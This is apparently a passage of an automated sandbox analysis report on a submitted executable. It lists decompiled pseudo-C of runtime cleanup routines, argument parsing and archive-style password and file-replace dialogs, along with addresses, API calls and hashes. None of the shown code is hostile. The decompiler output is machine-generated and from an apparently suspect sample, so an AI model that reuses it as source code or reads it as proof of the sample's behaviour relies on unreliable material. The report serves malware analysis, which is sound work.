					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xef1c48; // 0xf25d6c
					if(_t25 != 0) {
						E00EDD5AA(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xef1c70; // 0xef1c38
					if(_t26 != 0) {
						E00EDD5AA(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xef1c74; // 0xf25d70
					if(_t27 != 0) {
						return E00EDD5AA(_t6);
					}
				}
				return _t6;
			}










                                                                                                                0x00ee0fb5
                                                                                                                0x00ee0fba
                                                                                                                0x00ee0fbe
                                                                                                                0x00ee0fc4
                                                                                                                0x00ee0fc7
                                                                                                                0x00ee0fcc
                                                                                                                0x00ee0fd0
                                                                                                                0x00ee0fd6
                                                                                                                0x00ee0fd9
                                                                                                                0x00ee0fde
                                                                                                                0x00ee0fe2
                                                                                                                0x00ee0fe8
                                                                                                                0x00ee0feb
                                                                                                                0x00ee0ff0
                                                                                                                0x00ee0ff4
                                                                                                                0x00ee0ffa
                                                                                                                0x00ee0ffd
                                                                                                                0x00ee1002
                                                                                                                0x00ee1003
                                                                                                                0x00ee1006
                                                                                                                0x00ee100c
                                                                                                                0x00000000
                                                                                                                0x00ee1014
                                                                                                                0x00ee100c
                                                                                                                0x00ee1017

                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00EE0FC7
                                                                                                                  • Part of subcall function 00EDD5AA: RtlFreeHeap.NTDLL(00000000,00000000,?,00EE1046,?,00000000,?,00000000,?,00EE106D,?,00000007,?,?,00EE146A,?), ref: 00EDD5C0
                                                                                                                  • Part of subcall function 00EDD5AA: GetLastError.KERNEL32(?,?,00EE1046,?,00000000,?,00000000,?,00EE106D,?,00000007,?,?,00EE146A,?,?), ref: 00EDD5D2
                                                                                                                • _free.LIBCMT ref: 00EE0FD9
                                                                                                                • _free.LIBCMT ref: 00EE0FEB
                                                                                                                • _free.LIBCMT ref: 00EE0FFD
                                                                                                                • _free.LIBCMT ref: 00EE100F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: 7fabc5e003c47d39fb873dce10fab051dc8800cbbfd4420ef516a79596a607d7
                                                                                                                • Instruction ID: 178a1f6cf1ff60c53521296da9a5090d0717ceaf5471e6549aceef912cdcfa20
                                                                                                                • Opcode Fuzzy Hash: 7fabc5e003c47d39fb873dce10fab051dc8800cbbfd4420ef516a79596a607d7
                                                                                                                • Instruction Fuzzy Hash: 2AF0443264C258EB8638EB6AF885CA673D9FB803183652845F008F7608CB71FCC0C650
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDCFF0, Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E00EDCFF0(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0xef1c30; // 0x31a23f8
					if(_t7 != 0xef1a10) {
						E00EDD5AA(_t7);
						 *0xef1c30 = 0xef1a10;
					}
				}
				E00EDD5AA( *0xf258f4);
				 *0xf258f4 = 0;
				E00EDD5AA( *0xf258f8);
				 *0xf258f8 = 0;
				E00EDD5AA( *0xf25d40);
				 *0xf25d40 = 0;
				E00EDD5AA( *0xf25d44);
				 *0xf25d44 = 0;
				return 1;
			}




                                                                                                                0x00edcff9
                                                                                                                0x00edcffd
                                                                                                                0x00edcfff
                                                                                                                0x00edd00b
                                                                                                                0x00edd00e
                                                                                                                0x00edd014
                                                                                                                0x00edd014
                                                                                                                0x00edd00b
                                                                                                                0x00edd020
                                                                                                                0x00edd02d
                                                                                                                0x00edd033
                                                                                                                0x00edd03e
                                                                                                                0x00edd044
                                                                                                                0x00edd04f
                                                                                                                0x00edd055
                                                                                                                0x00edd05d
                                                                                                                0x00edd066

                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00EDD00E
                                                                                                                  • Part of subcall function 00EDD5AA: RtlFreeHeap.NTDLL(00000000,00000000,?,00EE1046,?,00000000,?,00000000,?,00EE106D,?,00000007,?,?,00EE146A,?), ref: 00EDD5C0
                                                                                                                  • Part of subcall function 00EDD5AA: GetLastError.KERNEL32(?,?,00EE1046,?,00000000,?,00000000,?,00EE106D,?,00000007,?,?,00EE146A,?,?), ref: 00EDD5D2
                                                                                                                • _free.LIBCMT ref: 00EDD020
                                                                                                                • _free.LIBCMT ref: 00EDD033
                                                                                                                • _free.LIBCMT ref: 00EDD044
                                                                                                                • _free.LIBCMT ref: 00EDD055
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: c26b4a3b49bc9d2095d629f32d259fe948a676b9fbbac11b9256fd557ac03859
                                                                                                                • Instruction ID: 1cc1de81d26f260b46ec1099b8664ad963bca48746a34053fbac97387b75c5ec
                                                                                                                • Opcode Fuzzy Hash: c26b4a3b49bc9d2095d629f32d259fe948a676b9fbbac11b9256fd557ac03859
                                                                                                                • Instruction Fuzzy Hash: B8F03A7180DA28CFC635AF14FC064943BA1F758B247862147F415BA379CB325953AA80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDC643, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00EDC643(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E00EE0360(_t52);
					GetModuleFileNameA(0, 0xf25798, 0x104);
					_t49 =  *0xf25d48; // 0x3193338
					 *0xf25d50 = 0xf25798;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0xf25798;
					}
					_v8 = 0;
					_v16 = 0;
					E00EDC767(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00EDC8DC(_v8, _v16, 1);
					if(_t64 != 0) {
						E00EDC767(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E00EDFE73(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0xf25d3c = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0xf25d40 = _t59;
									L16:
									E00EDD5AA(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0xf25d3c = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0xf25d40 = _t43;
						goto L10;
					} else {
						_t44 = E00EDD9BD();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E00EDD5AA(_t64);
						return _t50;
					}
				} else {
					_t45 = E00EDD9BD();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00EDD89C();
					return _t65;
				}
			}





















                                                                                                                0x00edc643
                                                                                                                0x00edc650
                                                                                                                0x00edc670
                                                                                                                0x00edc683
                                                                                                                0x00edc689
                                                                                                                0x00edc68f
                                                                                                                0x00edc697
                                                                                                                0x00edc69e
                                                                                                                0x00edc69e
                                                                                                                0x00edc6a3
                                                                                                                0x00edc6aa
                                                                                                                0x00edc6b1
                                                                                                                0x00edc6c3
                                                                                                                0x00edc6ca
                                                                                                                0x00edc6e9
                                                                                                                0x00edc6f5
                                                                                                                0x00edc710
                                                                                                                0x00edc713
                                                                                                                0x00edc71a
                                                                                                                0x00edc720
                                                                                                                0x00edc727
                                                                                                                0x00edc72a
                                                                                                                0x00edc72c
                                                                                                                0x00edc730
                                                                                                                0x00edc73a
                                                                                                                0x00edc73a
                                                                                                                0x00edc73c
                                                                                                                0x00edc742
                                                                                                                0x00edc745
                                                                                                                0x00edc747
                                                                                                                0x00edc74d
                                                                                                                0x00edc74e
                                                                                                                0x00edc754
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edc732
                                                                                                                0x00edc732
                                                                                                                0x00edc732
                                                                                                                0x00edc735
                                                                                                                0x00edc736
                                                                                                                0x00000000
                                                                                                                0x00edc732
                                                                                                                0x00edc722
                                                                                                                0x00000000
                                                                                                                0x00edc722
                                                                                                                0x00edc6fb
                                                                                                                0x00edc700
                                                                                                                0x00edc702
                                                                                                                0x00edc704
                                                                                                                0x00000000
                                                                                                                0x00edc6cc
                                                                                                                0x00edc6cc
                                                                                                                0x00edc6d1
                                                                                                                0x00edc6d3
                                                                                                                0x00edc6d4
                                                                                                                0x00edc709
                                                                                                                0x00edc709
                                                                                                                0x00edc757
                                                                                                                0x00edc758
                                                                                                                0x00000000
                                                                                                                0x00edc761
                                                                                                                0x00edc658
                                                                                                                0x00edc658
                                                                                                                0x00edc65f
                                                                                                                0x00edc660
                                                                                                                0x00edc662
                                                                                                                0x00000000
                                                                                                                0x00edc667

                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\KeJ7Cl7flZ.exe,00000104), ref: 00EDC683
                                                                                                                • _free.LIBCMT ref: 00EDC74E
                                                                                                                • _free.LIBCMT ref: 00EDC758
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _free$FileModuleName
                                                                                                                • String ID: C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                                • API String ID: 2506810119-180967374
                                                                                                                • Opcode ID: ab8e742ee79a85b5cc6334a278305fb92593d7a48371693338ef3cad7f5aaa8e
                                                                                                                • Instruction ID: 5ca7bab6eaf1e33f504047cf0e30f2fec2ccac56c4e694b16fbe8b753ecfc122
                                                                                                                • Opcode Fuzzy Hash: ab8e742ee79a85b5cc6334a278305fb92593d7a48371693338ef3cad7f5aaa8e
                                                                                                                • Instruction Fuzzy Hash: 6F318171A04219EFCB21DBA9DC85D9EBBF8EB84B54B606067F804A7311D7709A42DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC3E13, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 57%
                                                                                                                			E00EC3E13(void* __ebx, void* __ecx, void* __edi) {
				void* __esi;
				intOrPtr _t26;
				signed int* _t30;
				void* _t31;
				void* _t34;
				void* _t42;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t50;

				_t44 = __edi;
				_t43 = __ecx;
				_t42 = __ebx;
				_t48 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t46 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
					 *((char*)(_t48 + 8)) = 0;
					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
						E00EC799C( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t48 + 0x70));
					if(_t26 == 0) {
						E00EC66F4(_t48 + 8, "s", 0x50);
					} else {
						_t34 = _t26 - 1;
						if(_t34 == 0) {
							_push(_t48 - 0x48);
							_push("$%s");
							goto L9;
						} else {
							if(_t34 == 1) {
								_push(_t48 - 0x48);
								_push("@%s");
								L9:
								_push(0x50);
								_push(_t48 + 8);
								E00EC49D6();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t30 = E00EDA931(_t42, _t43, _t44, _t46, _t48 + 0x58,  *((intOrPtr*)(_t46 + 0x14)),  *((intOrPtr*)(_t46 + 0x18)), 4, E00EC3C30);
					if(_t30 == 0) {
						goto L1;
					} else {
						_t20 = 0xef1048 +  *_t30 * 0xc; // 0xee8428
						E00EDAFA0( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
						_t31 = 1;
					}
				} else {
					L1:
					_t31 = 0;
				}
				return _t31;
			}














                                                                                                                0x00ec3e13
                                                                                                                0x00ec3e13
                                                                                                                0x00ec3e13
                                                                                                                0x00ec3e14
                                                                                                                0x00ec3e18
                                                                                                                0x00ec3e1f
                                                                                                                0x00ec3e25
                                                                                                                0x00ec3e35
                                                                                                                0x00ec3e3b
                                                                                                                0x00ec3e3f
                                                                                                                0x00ec3e42
                                                                                                                0x00ec3e4d
                                                                                                                0x00ec3e4d
                                                                                                                0x00ec3e55
                                                                                                                0x00ec3e58
                                                                                                                0x00ec3e93
                                                                                                                0x00ec3e5a
                                                                                                                0x00ec3e5a
                                                                                                                0x00ec3e5d
                                                                                                                0x00ec3e72
                                                                                                                0x00ec3e73
                                                                                                                0x00000000
                                                                                                                0x00ec3e5f
                                                                                                                0x00ec3e62
                                                                                                                0x00ec3e67
                                                                                                                0x00ec3e68
                                                                                                                0x00ec3e78
                                                                                                                0x00ec3e7b
                                                                                                                0x00ec3e7d
                                                                                                                0x00ec3e7e
                                                                                                                0x00ec3e83
                                                                                                                0x00ec3e83
                                                                                                                0x00ec3e62
                                                                                                                0x00ec3e5d
                                                                                                                0x00ec3ea9
                                                                                                                0x00ec3eb3
                                                                                                                0x00000000
                                                                                                                0x00ec3eb9
                                                                                                                0x00ec3ebf
                                                                                                                0x00ec3ec8
                                                                                                                0x00ec3ed0
                                                                                                                0x00ec3ed0
                                                                                                                0x00ec3e27
                                                                                                                0x00ec3e27
                                                                                                                0x00ec3e27
                                                                                                                0x00ec3e27
                                                                                                                0x00ec3ed7

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: __fprintf_l_strncpy
                                                                                                                • String ID: $%s$@%s
                                                                                                                • API String ID: 1857242416-834177443
                                                                                                                • Opcode ID: d49e639e7c04c7b981bb97ebe44f901e0472b2586764de309a4bf5a597c4c5b3
                                                                                                                • Instruction ID: 095547d003247ec1f7f14dccc3583af40e6614dd75ab8c63f820a8f87ee2c942
                                                                                                                • Opcode Fuzzy Hash: d49e639e7c04c7b981bb97ebe44f901e0472b2586764de309a4bf5a597c4c5b3
                                                                                                                • Instruction Fuzzy Hash: FD21627250030CAEDF20DEB4CE05FEE3BA8AB15304F04541AF914B61A2E272DA568B61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECFC60, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 69%
                                                                                                                			E00ECFC60(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E00EC11DA(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E00EC582D(_t24, 0xf1b0e8,  &_v260);
					E00EC5878( &_v260, 0x80);
					_push(1);
					L7:
					 *0xf2609c(_t28);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










                                                                                                                0x00ecfc6a
                                                                                                                0x00ecfc6e
                                                                                                                0x00ecfc72
                                                                                                                0x00ecfc8b
                                                                                                                0x00ecfcfa
                                                                                                                0x00000000
                                                                                                                0x00ecfcfc
                                                                                                                0x00ecfc8d
                                                                                                                0x00ecfc93
                                                                                                                0x00ecfcf4
                                                                                                                0x00000000
                                                                                                                0x00ecfcf4
                                                                                                                0x00ecfc98
                                                                                                                0x00ecfca7
                                                                                                                0x00000000
                                                                                                                0x00ecfca7
                                                                                                                0x00ecfc9d
                                                                                                                0x00ecfca0
                                                                                                                0x00ecfcc6
                                                                                                                0x00ecfcd8
                                                                                                                0x00ecfce5
                                                                                                                0x00ecfcea
                                                                                                                0x00ecfcad
                                                                                                                0x00ecfcae
                                                                                                                0x00000000
                                                                                                                0x00ecfcae
                                                                                                                0x00ecfca5
                                                                                                                0x00ecfcab
                                                                                                                0x00000000
                                                                                                                0x00ecfcab
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00EC11DA: GetDlgItem.USER32(00000000,00003021), ref: 00EC121E
                                                                                                                  • Part of subcall function 00EC11DA: SetWindowTextW.USER32(00000000,00EE7544), ref: 00EC1234
                                                                                                                • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00ECFCC6
                                                                                                                • SetDlgItemTextW.USER32(?,00000067,?), ref: 00ECFCF4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ItemText$Window
                                                                                                                • String ID: Ht>*$GETPASSWORD1
                                                                                                                • API String ID: 2802354418-2243635732
                                                                                                                • Opcode ID: a6effb622caa27e002c6cfca55c4a87521db305bb4d32f1eb8c4e6aa8440791a
                                                                                                                • Instruction ID: 854226172b9cc720a3b32901f94e62aaf2cecb1c277c9d0ec359ce364d5e6787
                                                                                                                • Opcode Fuzzy Hash: a6effb622caa27e002c6cfca55c4a87521db305bb4d32f1eb8c4e6aa8440791a
                                                                                                                • Instruction Fuzzy Hash: AC110833A4011CBADB219A649E49FFBBB6DEF49715F101079FE45F2080C272AD53A674
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC32B6, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E00EC32B6(void* __ecx, void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				void* _t13;
				signed int _t14;
				short* _t20;
				void* _t23;
				signed short* _t27;
				signed int _t29;
				signed int _t31;

				_t20 = _a8;
				_t27 = _a4;
				 *_t20 = 0;
				_t10 = E00EC3528(_t27);
				if(_t10 == 0) {
					_t29 = 0x5c;
					if( *_t27 == _t29 && _t27[1] == _t29) {
						_push(_t29);
						_push( &(_t27[2]));
						_t10 = E00ED49DE(__ecx);
						_pop(_t23);
						if(_t10 != 0) {
							_push(_t29);
							_push(_t10 + 2);
							_t13 = E00ED49DE(_t23);
							if(_t13 == 0) {
								_t14 = E00ED8683(_t27);
							} else {
								_t14 = (_t13 - _t27 >> 1) + 1;
							}
							asm("sbb esi, esi");
							_t31 = _t29 & _t14;
							E00EDA7C0(_t20, _t27, _t31);
							_t10 = 0;
							 *((short*)(_t20 + _t31 * 2)) = 0;
						}
					}
					return _t10;
				}
				return E00EC37E6(_t20, _a12, L"%c:\\",  *_t27 & 0x0000ffff);
			}











                                                                                                                0x00ec32b7
                                                                                                                0x00ec32be
                                                                                                                0x00ec32c3
                                                                                                                0x00ec32c6
                                                                                                                0x00ec32cd
                                                                                                                0x00ec32ea
                                                                                                                0x00ec32ee
                                                                                                                0x00ec32f9
                                                                                                                0x00ec32fa
                                                                                                                0x00ec32fb
                                                                                                                0x00ec3301
                                                                                                                0x00ec3304
                                                                                                                0x00ec3309
                                                                                                                0x00ec330a
                                                                                                                0x00ec330b
                                                                                                                0x00ec3314
                                                                                                                0x00ec331e
                                                                                                                0x00ec3316
                                                                                                                0x00ec331a
                                                                                                                0x00ec331a
                                                                                                                0x00ec3328
                                                                                                                0x00ec332a
                                                                                                                0x00ec332f
                                                                                                                0x00ec3337
                                                                                                                0x00ec3339
                                                                                                                0x00ec3339
                                                                                                                0x00ec3304
                                                                                                                0x00000000
                                                                                                                0x00ec333d
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • _swprintf.LIBCMT ref: 00EC32DD
                                                                                                                  • Part of subcall function 00EC37E6: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00EC37F9
                                                                                                                • _wcschr.LIBVCRUNTIME ref: 00EC32FB
                                                                                                                • _wcschr.LIBVCRUNTIME ref: 00EC330B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                                • String ID: %c:\
                                                                                                                • API String ID: 525462905-3142399695
                                                                                                                • Opcode ID: e6935766174b449404f21368d8bf63342c481394f5330e8ba270675f33071199
                                                                                                                • Instruction ID: 615d2ed974f1a48f8283c302afea2b193a678bb668e9dcd0f6b21e78b8f6709b
                                                                                                                • Opcode Fuzzy Hash: e6935766174b449404f21368d8bf63342c481394f5330e8ba270675f33071199
                                                                                                                • Instruction Fuzzy Hash: 7E014963404352B9CB3167798D41E6BE7ECDE95B70700E40FF454E6182EE32D953C2A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED24F5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00ED24F5(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				WCHAR* _t16;
				_Unknown_base(*)()* _t19;
				int _t22;

				 *0xf222f8 = _a12;
				 *0xf222fc = _a16;
				 *0xf0ca64 = _a20;
				if( *0xf0ca60 == 0) {
					if( *0xf0ca37 == 0) {
						_t19 = E00ED0BA0;
						_t16 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0xf0ca40, _t16,  *0xf0ca58, _t19, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0xf0ca3c, L"RENAMEDLG",  *0xf0ca30, E00ED1E90, _a4) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}






                                                                                                                0x00ed2502
                                                                                                                0x00ed250a
                                                                                                                0x00ed2512
                                                                                                                0x00ed2517
                                                                                                                0x00ed2524
                                                                                                                0x00ed252e
                                                                                                                0x00ed2533
                                                                                                                0x00ed255d
                                                                                                                0x00ed2574
                                                                                                                0x00ed2579
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed255b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed255b
                                                                                                                0x00000000
                                                                                                                0x00ed257f
                                                                                                                0x00000000
                                                                                                                0x00ed2528
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                • API String ID: 0-56093855
                                                                                                                • Opcode ID: 654c0358e1f6e62f79d7943643c73eb0cad8e58e60bc055ea8c4dcdb5887d191
                                                                                                                • Instruction ID: 79473f3b77027e2d14dc0139064e94554c803dc7a7337fcd79a79fe59b3c4781
